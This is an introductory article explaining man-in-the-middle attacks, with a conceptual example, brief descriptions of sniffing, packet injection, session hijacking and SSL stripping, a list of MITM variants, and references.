# What is Man in the Middle Attack and Techniques of Deployment

January 30, 2018

Security is kept at the topmost priority when it comes in the field of networking and communications. Surfing the internet through untrustworthy public networks (whether wired or wireless) has been known to be risky for a long time now. We all think twice before logging into our bank account or accessing any kind of sensitive information. this topic is helps to understand the man-in-the-middle attack.

### Overview of man-in-the-middle attack

A man-in-the-middle attack is a type of cyberattack where a malicious actor inserts him/herself into a conversation between two parties, impersonates both parties and gains access to information that the two parties were trying to send to each other. A man-in-the-middle attack allows a malicious actor to intercept, send and receive data meant for someone else, or not meant to be sent at all, without either outside party knowing until it is too late. MITM attacks are relatively uncommon in the wired Internet, since there are very few places where an attacker can insert itself between two communicating terminals and remain undetected. For wireless links, however, the situation is quite different. Unless proper security is maintained on wireless last hop links, it can be fairly easy for an attacker to insert itself, depending on the nature of the wireless link layer protocol.

Man-in-the-middle (MITM) attacks occur when the attacker manages to position himself between the legitimate parties to a conversation. The attacker spoofs the opposite legitimate party so that all parties believe they are actually talking to the expected other, legitimate parties. Following are the Key concept of the Man in the Middle Attack:

• Man-in-the-middle is a type of eavesdropping attack that occurs when a malicious actor inserts himself as a relay/proxy into a communication session between people or systems.
• A MITM attack exploits the real-time processing of transactions, conversations or transfer of other data.
• Man-in-the-middle attacks allow attackers to intercept, send and receive data never meant to be for them without either outside party knowing until it is too late.

Example

For example, ABC and XYZ are communicating. And there is King, the attacker, who eavesdrops their conversation. King is the man-in-the-middle and in this case he performs passive attack. Instead, if King interferes with the conversation and sends message to ABC while pretending to be XYZ and sends message to XYZ while pretending to be ABC, he performs an active attack in which ABC and XYZ do not know that the message they receive is not from the real person.

figure 1 Man-in-the-Middle Attack example

### Man-in-the-Middle Attack Techniques

Sniffing

Attackers use packet capture tools to inspect packets at a low level. Using specific wireless devices that are allowed to be put into monitoring or promiscuous mode can allow an attacker to see packets that are not intended for it to see, such as packets addressed to other hosts.

Packet Injection

An attacker can also leverage their device’s monitoring mode to inject malicious packets into data communication streams. The packets can blend in with valid data communication streams, appearing to be part of the communication, but malicious in nature. Packet injection usually involves first sniffing to determine how and when to craft and send packets.

Session Hijacking

Most web applications use a login mechanism that generates a temporary session token to use for future requests to avoid requiring the user to type a password at every page. An attacker can sniff sensitive traffic to identify the session token for a user and use it to make requests as the user. The attacker does not need to spoof once he has a session token.

SSL Stripping

Since using HTTPS is a common safeguard against ARP or DNS spoofing, attackers use SSL stripping to intercept packets and alter their HTTPS-based address requests to go to their HTTP equivalent endpoint, forcing the host to make requests to the server unencrypted. Sensitive information can be leaked in plain text.

### Different Types of Man in the Middle attack

As you imagine, there is complexity in the subject and there is not just simply ‘one type of Man in the Middle attack’ – rather, the term is used to describe a category of attack. Here are a few types of MITM attacks:

• ARP poisoning
• Wi-Fi WEP/ WPA/2 Hacking
• DNS spoofing
• STP mangling
• Port stealing

### References

[1] Man in the Middle (MITM) Attack: Man-in-the-Middle Tutorial: Learn About Man-in-the-Middle Attacks, Vulnerabilities and How to Prevent MITM Attacks, available online at: https://www.veracode.com/security/man-middle-attack

[2] Subodh Gangan, “A review of man-in-the-middle attacks.” arXiv preprint arXiv: 1504.02115 (2015).

[3] “Man-in-the-Middle (MITM) Attacks”, available online at: https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/

[4] Jesudoss A, and Subramaniam N.P, A Survey on Authentication Attacks and Countermeasures in a Distributed Environment, Indian Journal of Computer Science and Engineering (IJCSE), Volume 5 Number 2 Apr-May 2014

$${}$$